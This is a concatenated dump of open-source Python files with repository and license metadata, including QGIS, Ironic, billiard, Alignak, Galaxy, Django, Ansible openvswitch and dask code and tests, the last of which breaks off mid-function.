self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((100 40, 150 20, 250 110, 100 40))')
shape.attemptSetSceneRect(QRectF(30, 10, 100, 200))
self.assertEqual(shape.clipPath().asWkt(), 'Polygon ((30 30, 80 10, 180 100, 30 30))')
# bit gross - this needs fixing in the item. It shouldn't rely on a draw operation to update the
# path as a result of a move/resize
im = QImage()
p = QPainter(im)
rc = QgsLayoutUtils.createRenderContextForLayout(l, p)
shape.draw(QgsLayoutItemRenderContext(rc))
p.end()
self.assertEqual(len(spy), 5)
if __name__ == '__main__':
unittest.main()
| gpl-2.0 |
supermari0/ironic | doc/source/conf.py | 8 | 2542 | # -*- coding: utf-8 -*-
#
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinxcontrib.httpdomain',
'sphinxcontrib.pecanwsme.rest',
'wsmeext.sphinxext',
'oslosphinx',
]
wsme_protocols = ['restjson']
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Ironic'
copyright = u'OpenStack Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
from ironic import version as ironic_version
# The full version, including alpha/beta/rc tags.
release = ironic_version.version_info.release_string()
# The short X.Y version.
version = ironic_version.version_info.version_string()
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['ironic.']
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
#html_theme_path = ["."]
#html_theme = '_theme'
#html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
(
'index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation',
'manual'
),
]
| apache-2.0 |
flaviogrossi/billiard | billiard/process.py | 2 | 10580 | #
# Module providing the `Process` class which emulates `threading.Thread`
#
# multiprocessing/process.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import os
import sys
import signal
import itertools
import logging
import threading
from _weakrefset import WeakSet
from multiprocessing import process as _mproc
from .five import items, string_t
try:
ORIGINAL_DIR = os.path.abspath(os.getcwd())
except OSError:
ORIGINAL_DIR = None
__all__ = ['BaseProcess', 'Process', 'current_process', 'active_children']
#
# Public functions
#
def current_process():
'''
Return process object representing the current process
'''
return _current_process
def _set_current_process(process):
global _current_process
_current_process = _mproc._current_process = process
def _cleanup():
# check for processes which have finished
for p in list(_children):
if p._popen.poll() is not None:
_children.discard(p)
def _maybe_flush(f):
try:
f.flush()
except (AttributeError, EnvironmentError, NotImplementedError):
pass
def active_children(_cleanup=_cleanup):
'''
Return list of process objects corresponding to live child processes
'''
try:
_cleanup()
except TypeError:
# called after gc collect so _cleanup does not exist anymore
return []
return list(_children)
class BaseProcess(object):
'''
Process objects represent activity that is run in a separate process
The class is analagous to `threading.Thread`
'''
def _Popen(self):
raise NotImplementedError()
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, daemon=None, **_kw):
assert group is None, 'group argument must be None for now'
count = next(_process_counter)
self._identity = _current_process._identity + (count, )
self._config = _current_process._config.copy()
self._parent_pid = os.getpid()
self._popen = None
self._target = target
self._args = tuple(args)
self._kwargs = dict(kwargs)
self._name = (
name or type(self).__name__ + '-' +
':'.join(str(i) for i in self._identity)
)
if daemon is not None:
self.daemon = daemon
if _dangling is not None:
_dangling.add(self)
def run(self):
'''
Method to be run in sub-process; can be overridden in sub-class
'''
if self._target:
self._target(*self._args, **self._kwargs)
def start(self):
'''
Start child process
'''
assert self._popen is None, 'cannot start a process twice'
assert self._parent_pid == os.getpid(), \
'can only start a process object created by current process'
assert not _current_process._config.get('daemon'), \
'daemonic processes are not allowed to have children'
_cleanup()
self._popen = self._Popen(self)
self._sentinel = self._popen.sentinel
_children.add(self)
def terminate(self):
'''
Terminate process; sends SIGTERM signal or uses TerminateProcess()
'''
self._popen.terminate()
def join(self, timeout=None):
'''
Wait until child process terminates
'''
assert self._parent_pid == os.getpid(), 'can only join a child process'
assert self._popen is not None, 'can only join a started process'
res = self._popen.wait(timeout)
if res is not None:
_children.discard(self)
def is_alive(self):
'''
Return whether process is alive
'''
if self is _current_process:
return True
assert self._parent_pid == os.getpid(), 'can only test a child process'
if self._popen is None:
return False
self._popen.poll()
return self._popen.returncode is None
def _is_alive(self):
if self._popen is None:
return False
return self._popen.poll() is None
@property
def name(self):
return self._name
@name.setter
def name(self, name): # noqa
assert isinstance(name, string_t), 'name must be a string'
self._name = name
@property
def daemon(self):
'''
Return whether process is a daemon
'''
return self._config.get('daemon', False)
@daemon.setter # noqa
def daemon(self, daemonic):
'''
Set whether process is a daemon
'''
assert self._popen is None, 'process has already started'
self._config['daemon'] = daemonic
@property
def authkey(self):
return self._config['authkey']
@authkey.setter # noqa
def authkey(self, authkey):
'''
Set authorization key of process
'''
self._config['authkey'] = AuthenticationString(authkey)
@property
def exitcode(self):
'''
Return exit code of process or `None` if it has yet to stop
'''
if self._popen is None:
return self._popen
return self._popen.poll()
@property
def ident(self):
'''
Return identifier (PID) of process or `None` if it has yet to start
'''
if self is _current_process:
return os.getpid()
else:
return self._popen and self._popen.pid
pid = ident
@property
def sentinel(self):
'''
Return a file descriptor (Unix) or handle (Windows) suitable for
waiting for process termination.
'''
try:
return self._sentinel
except AttributeError:
raise ValueError("process not started")
@property
def _children(self):
# compat for 2.7
return _children
def __repr__(self):
if self is _current_process:
status = 'started'
elif self._parent_pid != os.getpid():
status = 'unknown'
elif self._popen is None:
status = 'initial'
else:
if self._popen.poll() is not None:
status = self.exitcode
else:
status = 'started'
if type(status) is int:
if status == 0:
status = 'stopped'
else:
status = 'stopped[%s]' % _exitcode_to_name.get(status, status)
return '<%s(%s, %s%s)>' % (type(self).__name__, self._name,
status, self.daemon and ' daemon' or '')
##
def _bootstrap(self):
from . import util, context
global _current_process, _process_counter, _children
try:
if self._start_method is not None:
context._force_start_method(self._start_method)
_process_counter = itertools.count(1)
_children = set()
if sys.stdin is not None:
try:
sys.stdin.close()
sys.stdin = open(os.devnull)
except (OSError, ValueError):
pass
old_process = _current_process
_set_current_process(self)
# Re-init logging system.
# Workaround for http://bugs.python.org/issue6721/#msg140215
# Python logging module uses RLock() objects which are broken
# after fork. This can result in a deadlock (Celery Issue #496).
loggerDict = logging.Logger.manager.loggerDict
logger_names = list(loggerDict.keys())
logger_names.append(None) # for root logger
for name in logger_names:
if not name or not isinstance(loggerDict[name],
logging.PlaceHolder):
for handler in logging.getLogger(name).handlers:
handler.createLock()
logging._lock = threading.RLock()
try:
util._finalizer_registry.clear()
util._run_after_forkers()
finally:
# delay finalization of the old process object until after
# _run_after_forkers() is executed
del old_process
util.info('child process %s calling self.run()', self.pid)
try:
self.run()
exitcode = 0
finally:
util._exit_function()
except SystemExit as exc:
if not exc.args:
exitcode = 1
elif isinstance(exc.args[0], int):
exitcode = exc.args[0]
else:
sys.stderr.write(str(exc.args[0]) + '\n')
_maybe_flush(sys.stderr)
exitcode = 0 if isinstance(exc.args[0], str) else 1
except:
exitcode = 1
if not util.error('Process %s', self.name, exc_info=True):
import traceback
sys.stderr.write('Process %s:\n' % self.name)
traceback.print_exc()
finally:
util.info('process %s exiting with exitcode %d',
self.pid, exitcode)
_maybe_flush(sys.stdout)
_maybe_flush(sys.stderr)
return exitcode
#
# We subclass bytes to avoid accidental transmission of auth keys over network
#
class AuthenticationString(bytes):
def __reduce__(self):
from .context import get_spawning_popen
if get_spawning_popen() is None:
raise TypeError(
'Pickling an AuthenticationString object is '
'disallowed for security reasons')
return AuthenticationString, (bytes(self),)
#
# Create object representing the main process
#
class _MainProcess(BaseProcess):
def __init__(self):
self._identity = ()
self._name = 'MainProcess'
self._parent_pid = None
self._popen = None
self._config = {'authkey': AuthenticationString(os.urandom(32)),
'semprefix': '/mp'}
_current_process = _MainProcess()
_process_counter = itertools.count(1)
_children = set()
del _MainProcess
Process = BaseProcess
#
# Give names to some return codes
#
_exitcode_to_name = {}
for name, signum in items(signal.__dict__):
if name[:3] == 'SIG' and '_' not in name:
_exitcode_to_name[-signum] = name
# For debug and leak testing
_dangling = WeakSet()
| bsd-3-clause |
McIntyre-Lab/papers | newman_t1d_cases_2017/scripts/bwa_sam_parse.py | 1 | 2304 | #!/usr/bin/env python
import argparse
## This script parses a sam file from BWA-MEM and outputs a log of alignment counts and percentages.
# Parse command line arguments
parser = argparse.ArgumentParser(description='Parse sam file to get alignment counts.')
parser.add_argument('-sam','--sam_file',dest='sam', action='store', required=True, help='A Sam file to parse [Required]')
parser.add_argument('-o','--out', dest='out', action='store', required=True, help='Output file for alignment log [Required]')
args = parser.parse_args()
flags=list()
# Open sam file and create a list that contains only the second column from the sam file, (the bitwise flags).
with open(args.sam,'r') as sam:
for line in sam.readlines():
cols=line.split('\t')
flags.append(cols[1])
# Count the flags. These flags are based on BWA sam output, may not be the same for other aligners.
# The flags are different for paired data. There is another python script 'bwa_sam_parse_se.py' for single-end alignments.
unaln=flags.count('77') + flags.count('141') + flags.count('181') + flags.count('121') + flags.count('133') + flags.count('117') + flags.count('69')
aln=flags.count('99') + flags.count('73') + flags.count('185') + flags.count('147') + flags.count('83') + flags.count('163') + flags.count('97') + flags.count('137') + flags.count('145') + flags.count('81') + flags.count('161')+ flags.count('177') + flags.count('113') + flags.count('65') + flags.count('129')
ambig=flags.count('337') + flags.count('417') + flags.count('369') + flags.count('433') + flags.count('353') + flags.count('401') + flags.count('371')+ flags.count('355') + flags.count('403') + flags.count('419') + flags.count('339') + flags.count('387') + flags.count('385') + flags.count('323') + flags.count('435') + flags.count('321')
total = unaln + aln
# Get percentages
percent_aln = float (aln) / (total) * 100
percent_unaln = float (unaln) / (total) * 100
percent_ambig = float (ambig) / (total) * 100
# Write the counts to the output.
with open(args.out,'w') as dataout:
dataout.write('Total reads '+str(total)+'\nAligned '+str(aln)+'\nUnaligned '+str(unaln)+'\nAmbiguous '+str(ambig)+'\nPercent aligned '+str(percent_aln)+'\nPercent unaligned '+str(percent_unaln)+'\nPercent ambiguous '+str(percent_ambig))
| lgpl-3.0 |
Alignak-monitoring-contrib/alignak-app | test/test_panel_widget.py | 1 | 9176 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2015-2018:
# Matthieu Estrada, ttamalfor@gmail.com
#
# This file is part of (AlignakApp).
#
# (AlignakApp) is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# (AlignakApp) is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with (AlignakApp). If not, see <http://www.gnu.org/licenses/>.
import sys
import unittest2
from PyQt5.Qt import QApplication, QItemSelectionModel
from alignak_app.utils.config import settings
from alignak_app.backend.datamanager import data_manager
from alignak_app.items.host import Host
from alignak_app.items.service import Service
from alignak_app.qobjects.panel import PanelQWidget
class TestPanelQWidget(unittest2.TestCase):
"""
This file test the PanelQWidget class.
"""
settings.init_config()
# Host data test
host_list = []
for i in range(0, 10):
host = Host()
host.create(
'_id%d' % i,
{
'name': 'host%d' % i,
'alias': 'Host %d' % i,
'_id': '_id%d' % i,
'ls_downtimed': False,
'ls_acknowledged': False,
'ls_state': 'UNREACHABLE',
'ls_output': 'output host %d' % i,
'ls_last_check': '',
'_realm': '59c4e38535d17b8dcb0bed42',
'address': '127.0.0.1',
'business_impact': '2',
'notes': 'host notes',
'passive_checks_enabled': False,
'active_checks_enabled': True,
'_overall_state_id': 1,
'customs': {}
},
'host%d' % i
)
host_list.append(host)
# Service data test
service_list = []
for i in range(0, 10):
service = Service()
service.create(
'_id%d' % i,
{
'name': 'service%d' % i,
'alias': 'Service %d' % i,
'host': '_id%d' % i,
'_id': '_id%d' % i,
'ls_acknowledged': False,
'ls_downtimed': False,
'ls_state': 'CRITICAL',
'ls_output': 'output host %d' % i,
'aggregation': 'disk',
'_overall_state_id': 4,
'passive_checks_enabled': False,
'active_checks_enabled': True,
},
'service%d' % i
)
service_list.append(service)
@classmethod
def setUpClass(cls):
"""Create QApplication"""
try:
cls.app = QApplication(sys.argv)
except:
pass
def test_create_widget(self):
"""Inititalize PanelQWidget"""
# Add problems
data_manager.update_database('host', self.host_list)
data_manager.database['problems'] = []
for item in self.host_list:
data_manager.database['problems'].append(item)
for item in self.service_list:
data_manager.database['problems'].append(item)
for item in self.host_list:
assert 'host' in item.item_type
under_test = PanelQWidget()
self.assertIsNotNone(under_test.layout)
self.assertIsNotNone(under_test.dashboard_widget)
self.assertIsNotNone(under_test.synthesis_widget)
self.assertIsNotNone(under_test.spy_widget)
self.assertFalse(under_test.hostnames_list)
under_test.initialize()
self.assertIsNotNone(under_test.layout)
self.assertIsNotNone(under_test.dashboard_widget)
self.assertIsNotNone(under_test.synthesis_widget)
self.assertIsNotNone(under_test.spy_widget)
self.assertEqual(
['host0', 'host1', 'host2', 'host3', 'host4', 'host5',
'host6', 'host7', 'host8', 'host9'],
under_test.hostnames_list
)
def test_spy_host(self):
"""Panel Add Spy Host"""
# init_event_widget()
under_test = PanelQWidget()
under_test.initialize()
# Host is not in hostname_list
under_test.synthesis_widget.line_search.setText('no_host')
under_test.spy_host()
spy_index = under_test.get_tab_order().index('s')
self.assertTrue(under_test.synthesis_widget.host_widget.spy_btn.isEnabled())
self.assertEqual('Spy Hosts', under_test.tab_widget.tabText(spy_index))
# Host Id is not added in spied_hosts of SpyQWidget.SpyQListWidget
self.assertFalse('_id0' in under_test.spy_widget.spy_list_widget.spied_hosts)
def test_update_panels(self):
"""Update QTabPanel Problems"""
data_manager.database['problems'] = []
data_manager.update_database('host', self.host_list)
for item in self.host_list:
data_manager.database['problems'].append(item)
for item in self.service_list:
data_manager.database['problems'].append(item)
under_test = PanelQWidget()
under_test.initialize()
# 20 problems for CRITICAL services and UNREACHABLE hosts
problems_index = under_test.get_tab_order().index('p')
self.assertEqual('Problems (20)', under_test.tab_widget.tabText(problems_index))
# Remove a service from problems
data_manager.database['problems'].remove(self.service_list[0])
under_test.tab_widget.widget(problems_index).update_problems_data()
# There are only 9 services in CRITICAL condition
self.assertEqual('Problems (19)', under_test.tab_widget.tabText(problems_index))
def test_display_host(self):
"""Display Host in Panel"""
under_test = PanelQWidget()
under_test.initialize()
self.assertTrue(under_test.synthesis_widget.host_widget.spy_btn.isEnabled())
self.assertEqual(
'Host Synthesis',
under_test.tab_widget.tabText(
under_test.tab_widget.indexOf(under_test.synthesis_widget))
)
under_test.display_host()
# Host is not spied, so button is enable
self.assertTrue(under_test.synthesis_widget.host_widget.spy_btn.isEnabled())
# No customs, so button is not enabled
self.assertTrue(under_test.synthesis_widget.host_widget.customs_btn.isEnabled())
# Host and Services Qwidgets are hidden
self.assertTrue(under_test.synthesis_widget.host_widget.isHidden())
self.assertTrue(under_test.synthesis_widget.services_widget.isHidden())
# Hint QWidget is shown
self.assertFalse(under_test.synthesis_widget.hint_widget.isHidden())
self.assertEqual(
'Host Synthesis',
under_test.tab_widget.tabText(
under_test.tab_widget.indexOf(under_test.synthesis_widget))
)
under_test.synthesis_widget.line_search.setText(self.host_list[0].name)
under_test.display_host()
# Host is not spied, so button is enable
self.assertTrue(under_test.synthesis_widget.host_widget.spy_btn.isEnabled())
# No customs, so button is not enabled
self.assertFalse(under_test.synthesis_widget.host_widget.customs_btn.isEnabled())
# Host and Services Qwidgets are displayed
self.assertFalse(under_test.synthesis_widget.host_widget.isHidden())
self.assertFalse(under_test.synthesis_widget.services_widget.isHidden())
# Hint QWidget is hidden
self.assertTrue(under_test.synthesis_widget.hint_widget.isHidden())
self.assertEqual(
'Host "Host 0"',
under_test.tab_widget.tabText(
under_test.tab_widget.indexOf(under_test.synthesis_widget))
)
def test_set_host_from_problems(self):
"""Set Host in Panel from Problems QWidget"""
under_test = PanelQWidget()
under_test.initialize()
self.assertEqual('', under_test.synthesis_widget.line_search.text())
self.assertIsNone(under_test.problems_widget.get_current_user_role_item())
# Make an item as current in problems table
under_test.problems_widget.problems_table.update_view({'problems': [self.host_list[8]]})
index_test = under_test.problems_widget.problems_table.model().index(0, 0)
under_test.problems_widget.problems_table.selectionModel().setCurrentIndex(
index_test,
QItemSelectionModel.SelectCurrent
)
self.assertIsNotNone(under_test.problems_widget.get_current_user_role_item())
self.assertEqual('', under_test.synthesis_widget.line_search.text())
under_test.set_host_from_problems()
# Host is set in line search
self.assertEqual('host8', under_test.synthesis_widget.line_search.text())
| agpl-3.0 |
golharam/rgtools | scripts/galaxy/api/addFilesToLibrary.py | 1 | 4458 | #!/usr/bin/env python
"""
Author: Ryan Golhar <ryan.golhar@bms.com>
Date: 06/24/15
This script adds readme.txt, *.fastq.gz to a Galaxy Library
Usage: addFilesToLibrary [-h] [--api-key <API_KEY>] [--api-url <API_URL>] <path of directory to scan> <library_name>
"""
import ConfigParser
import os
import argparse
import sys
from common import display
from common import submit
import re
from bioblend import galaxy
import time
_debug = 1
_filesUploaded = 0
def uploadFile(fileToUpload, galaxyInstance, galaxyLibrary, destFolder = '/'):
# Note: Right now, Galaxy strips .gz files of .gz. So when searching of files, make sure to compare to data_set file_name
libraryContents = galaxyInstance.libraries.show_library(galaxyLibrary['id'], contents = True)
# Get the folder
galaxyFolder_id = None
for libraryEntry in libraryContents:
if libraryEntry['name'] == destFolder and libraryEntry['type'] == 'folder':
galaxyFolder_id = libraryEntry['id']
break
# Make sure the file doesn't exist in the destFolder
for libraryEntry in libraryContents:
if libraryEntry['type'] == 'file':
dataset = galaxyInstance.libraries.show_dataset(galaxyLibrary['id'], libraryEntry['id'])
if fileToUpload == dataset['file_name']:
print "File already exists in library: %s. Skipping." % libraryEntry['name']
return
# Upload file
if os.access(fileToUpload, os.R_OK):
print "Uploading file %s -> %s:%s" % (fileToUpload, galaxyLibrary['name'], destFolder)
result = galaxyInstance.libraries.upload_from_galaxy_filesystem(galaxyLibrary['id'], fileToUpload, galaxyFolder_id, file_type='fastq', link_data_only='link_to_files')
print result
global _filesUploaded
_filesUploaded = _filesUploaded+1
else:
print "%s is not accessbile" % fileToUpload
def main():
if _debug == 1:
print 'Galaxy API URL: %s' % args.api_url
print 'Galaxy API Key: %s' % args.api_key
print 'Path to Upload: %s' % args.pathToUpload
print 'Library: %s' % args.library
# 1. Make sure Galaxy library exist
# 2. Scan path for readme.txt and *.fastq.gz and upload files to library
# 1.
gi = galaxy.GalaxyInstance(url=args.api_url, key=args.api_key)
galaxyLibraries = gi.libraries.get_libraries(name=args.library, deleted=False)
for library in galaxyLibraries:
if library['deleted'] == False:
galaxyLibrary = library
if galaxyLibrary == None:
print "library %s not found" % args.library
exit(-1)
# 2. Scan the path for readme.txt, *.fastq.gz, *.fq.gz and upload to library
if os.path.isfile(args.pathToUpload):
uploadFile(args.pathToUpload, gi, galaxyLibrary)
elif os.path.isdir(args.pathToUpload):
# if args.pathToUpload.endswith('/'):
# Upload files in directory to dest
# 3. Scan the directory for *.fastq.gz and add each file
for root, dirs, files in os.walk(args.pathToUpload):
#for dir in dirs:
for file in files:
if (file.endswith('.gz')):
fileToUpload = os.path.join(root, file)
uploadFile(fileToUpload, gi, galaxyLibrary)
# else:
# Upload directory and contents
# print "make directory and upload to directory"
print "Uploaded %s files." % _filesUploaded
if __name__ == '__main__':
# Get defaults from ~/.galaxy.ini
config = ConfigParser.RawConfigParser()
if os.path.exists(os.path.expanduser("~/.galaxy.ini")):
config.read(os.path.expanduser("~/.galaxy.ini"))
_api_key = config.get('default', 'api_key')
_api_url = config.get('default', 'api_url')
else:
_api_key = None
_api_url = None
# Parse Command-Line Arguments
parser = argparse.ArgumentParser()
parser.add_argument('--api-url', help="Galaxy URL", default=_api_url)
parser.add_argument('--api-key', help="User's Galaxy Key", default=_api_key)
parser.add_argument('pathToUpload', help="File or Directory to upload")
parser.add_argument('library', help="Name of Library to add data to")
args = parser.parse_args()
# Do work
main()
| lgpl-3.0 |
areski/django | django/template/loaders/eggs.py | 145 | 2388 | # Wrapper for loading templates from eggs via pkg_resources.resource_string.
from __future__ import unicode_literals
import warnings
from django.apps import apps
from django.template import Origin, TemplateDoesNotExist
from django.utils import six
from django.utils.deprecation import RemovedInDjango20Warning
from .base import Loader as BaseLoader
try:
from pkg_resources import resource_string
except ImportError:
resource_string = None
warnings.warn('The egg template loader is deprecated.', RemovedInDjango20Warning)
class EggOrigin(Origin):
def __init__(self, app_name, pkg_name, *args, **kwargs):
self.app_name = app_name
self.pkg_name = pkg_name
super(EggOrigin, self).__init__(*args, **kwargs)
class Loader(BaseLoader):
def __init__(self, engine):
if resource_string is None:
raise RuntimeError("Setuptools must be installed to use the egg loader")
super(Loader, self).__init__(engine)
def get_contents(self, origin):
try:
source = resource_string(origin.app_name, origin.pkg_name)
except Exception:
raise TemplateDoesNotExist(origin)
if six.PY2:
source = source.decode(self.engine.file_charset)
return source
def get_template_sources(self, template_name):
pkg_name = 'templates/' + template_name
for app_config in apps.get_app_configs():
yield EggOrigin(
app_name=app_config.name,
pkg_name=pkg_name,
name="egg:%s:%s" % (app_config.name, pkg_name),
template_name=template_name,
loader=self,
)
def load_template_source(self, template_name, template_dirs=None):
"""
Loads templates from Python eggs via pkg_resource.resource_string.
For every installed app, it tries to get the resource (app, template_name).
"""
warnings.warn(
'The load_template_sources() method is deprecated. Use '
'get_template() or get_contents() instead.',
RemovedInDjango20Warning,
)
for origin in self.get_template_sources(template_name):
try:
return self.get_contents(origin), origin.name
except TemplateDoesNotExist:
pass
raise TemplateDoesNotExist(template_name)
| bsd-3-clause |
nitzmahone/ansible | test/units/modules/network/ovs/test_openvswitch_db.py | 44 | 6197 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.ovs import openvswitch_db
from units.modules.utils import set_module_args
from .ovs_module import TestOpenVSwitchModule, load_fixture
test_name_side_effect_matrix = {
'test_openvswitch_db_absent_idempotent': [
(0, 'openvswitch_db_disable_in_band_missing.cfg', None),
(0, None, None)],
'test_openvswitch_db_absent_removes_key': [
(0, 'openvswitch_db_disable_in_band_true.cfg', None),
(0, None, None)],
'test_openvswitch_db_present_idempotent': [
(0, 'openvswitch_db_disable_in_band_true.cfg', None),
(0, None, None)],
'test_openvswitch_db_present_adds_key': [
(0, 'openvswitch_db_disable_in_band_missing.cfg', None),
(0, None, None)],
'test_openvswitch_db_present_updates_key': [
(0, 'openvswitch_db_disable_in_band_true.cfg', None),
(0, None, None)],
'test_openvswitch_db_present_missing_key_on_map': [
(0, 'openvswitch_db_disable_in_band_true.cfg', None),
(0, None, None)],
'test_openvswitch_db_present_stp_enable': [
(0, 'openvswitch_db_disable_in_band_true.cfg', None),
(0, None, None)],
}
class TestOpenVSwitchDBModule(TestOpenVSwitchModule):
module = openvswitch_db
def setUp(self):
super(TestOpenVSwitchDBModule, self).setUp()
self.mock_run_command = (
patch('ansible.module_utils.basic.AnsibleModule.run_command'))
self.run_command = self.mock_run_command.start()
self.mock_get_bin_path = (
patch('ansible.module_utils.basic.AnsibleModule.get_bin_path'))
self.get_bin_path = self.mock_get_bin_path.start()
def tearDown(self):
super(TestOpenVSwitchDBModule, self).tearDown()
self.mock_run_command.stop()
self.mock_get_bin_path.stop()
def load_fixtures(self, test_name):
test_side_effects = []
for s in test_name_side_effect_matrix[test_name]:
rc = s[0]
out = load_fixture(s[1]) if s[1] else None
err = s[2]
side_effect_with_fixture_loaded = (rc, out, err)
test_side_effects.append(side_effect_with_fixture_loaded)
self.run_command.side_effect = test_side_effects
self.get_bin_path.return_value = '/usr/bin/ovs-vsctl'
def test_openvswitch_db_absent_idempotent(self):
set_module_args(dict(state='absent',
table='Bridge', record='test-br',
col='other_config', key='disable-in-band',
value='True'))
self.execute_module(test_name='test_openvswitch_db_absent_idempotent')
def test_openvswitch_db_absent_removes_key(self):
set_module_args(dict(state='absent',
table='Bridge', record='test-br',
col='other_config', key='disable-in-band',
value='True'))
self.execute_module(
changed=True,
commands=['/usr/bin/ovs-vsctl -t 5 remove Bridge test-br other_config'
' disable-in-band=True'],
test_name='test_openvswitch_db_absent_removes_key')
def test_openvswitch_db_present_idempotent(self):
set_module_args(dict(state='present',
table='Bridge', record='test-br',
col='other_config', key='disable-in-band',
value='True'))
self.execute_module(test_name='test_openvswitch_db_present_idempotent')
def test_openvswitch_db_present_adds_key(self):
set_module_args(dict(state='present',
table='Bridge', record='test-br',
col='other_config', key='disable-in-band',
value='True'))
self.execute_module(
changed=True,
commands=['/usr/bin/ovs-vsctl -t 5 set Bridge test-br other_config'
':disable-in-band=True'],
test_name='test_openvswitch_db_present_adds_key')
def test_openvswitch_db_present_updates_key(self):
set_module_args(dict(state='present',
table='Bridge', record='test-br',
col='other_config', key='disable-in-band',
value='False'))
self.execute_module(
changed=True,
commands=['/usr/bin/ovs-vsctl -t 5 set Bridge test-br other_config'
':disable-in-band=False'],
test_name='test_openvswitch_db_present_updates_key')
def test_openvswitch_db_present_missing_key_on_map(self):
set_module_args(dict(state='present',
table='Bridge', record='test-br',
col='other_config',
value='False'))
self.execute_module(
failed=True,
test_name='test_openvswitch_db_present_idempotent')
def test_openvswitch_db_present_stp_enable(self):
set_module_args(dict(state='present',
table='Bridge', record='test-br',
col='stp_enable',
value='False'))
self.execute_module(changed=True,
test_name='test_openvswitch_db_present_stp_enable')
| gpl-3.0 |
dfdx2/django | tests/admin_views/test_multidb.py | 23 | 2467 | from unittest import mock
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth.models import User
from django.db import connections
from django.test import TestCase, override_settings
from django.urls import reverse
from .models import Book
class Router:
target_db = None
def db_for_read(self, model, **hints):
return self.target_db
db_for_write = db_for_read
site = admin.AdminSite(name='test_adminsite')
site.register(Book)
urlpatterns = [
url(r'^admin/', site.urls),
]
@override_settings(ROOT_URLCONF=__name__, DATABASE_ROUTERS=['%s.Router' % __name__])
class MultiDatabaseTests(TestCase):
multi_db = True
@classmethod
def setUpTestData(cls):
cls.superusers = {}
cls.test_book_ids = {}
for db in connections:
Router.target_db = db
cls.superusers[db] = User.objects.create_superuser(
username='admin', password='something', email='test@test.org',
)
b = Book(name='Test Book')
b.save(using=db)
cls.test_book_ids[db] = b.id
@mock.patch('django.contrib.admin.options.transaction')
def test_add_view(self, mock):
for db in connections:
Router.target_db = db
self.client.force_login(self.superusers[db])
self.client.post(
reverse('test_adminsite:admin_views_book_add'),
{'name': 'Foobar: 5th edition'},
)
mock.atomic.assert_called_with(using=db)
@mock.patch('django.contrib.admin.options.transaction')
def test_change_view(self, mock):
for db in connections:
Router.target_db = db
self.client.force_login(self.superusers[db])
self.client.post(
reverse('test_adminsite:admin_views_book_change', args=[self.test_book_ids[db]]),
{'name': 'Test Book 2: Test more'},
)
mock.atomic.assert_called_with(using=db)
@mock.patch('django.contrib.admin.options.transaction')
def test_delete_view(self, mock):
for db in connections:
Router.target_db = db
self.client.force_login(self.superusers[db])
self.client.post(
reverse('test_adminsite:admin_views_book_delete', args=[self.test_book_ids[db]]),
{'post': 'yes'},
)
mock.atomic.assert_called_with(using=db)
| bsd-3-clause |
jayhetee/dask | dask/array/numpy_compat.py | 9 | 1606 | import numpy as np
try:
isclose = np.isclose
except AttributeError:
def isclose(*args, **kwargs):
raise RuntimeError("You need numpy version 1.7 or greater to use "
"isclose.")
try:
full = np.full
except AttributeError:
def full(shape, fill_value, dtype=None, order=None):
"""Our implementation of numpy.full because your numpy is old."""
if order is not None:
raise NotImplementedError("`order` kwarg is not supported upgrade "
"to Numpy 1.8 or greater for support.")
return np.multiply(fill_value, np.ones(shape, dtype=dtype),
dtype=dtype)
# Taken from scikit-learn:
# https://github.com/scikit-learn/scikit-learn/blob/master/sklearn/utils/fixes.py#L84
try:
if (not np.allclose(np.divide(.4, 1, casting="unsafe"),
np.divide(.4, 1, casting="unsafe", dtype=np.float))
or not np.allclose(np.divide(.4, 1), .4)):
raise TypeError('Divide not working with dtype: '
'https://github.com/numpy/numpy/issues/3484')
divide = np.divide
except TypeError:
# Divide with dtype doesn't work on Python 3
def divide(x1, x2, out=None, dtype=None):
"""Implementation of numpy.divide that works with dtype kwarg.
Temporary compatibility fix for a bug in numpy's version. See
https://github.com/numpy/numpy/issues/3484 for the relevant issue."""
x = np.divide(x1, x2, out)
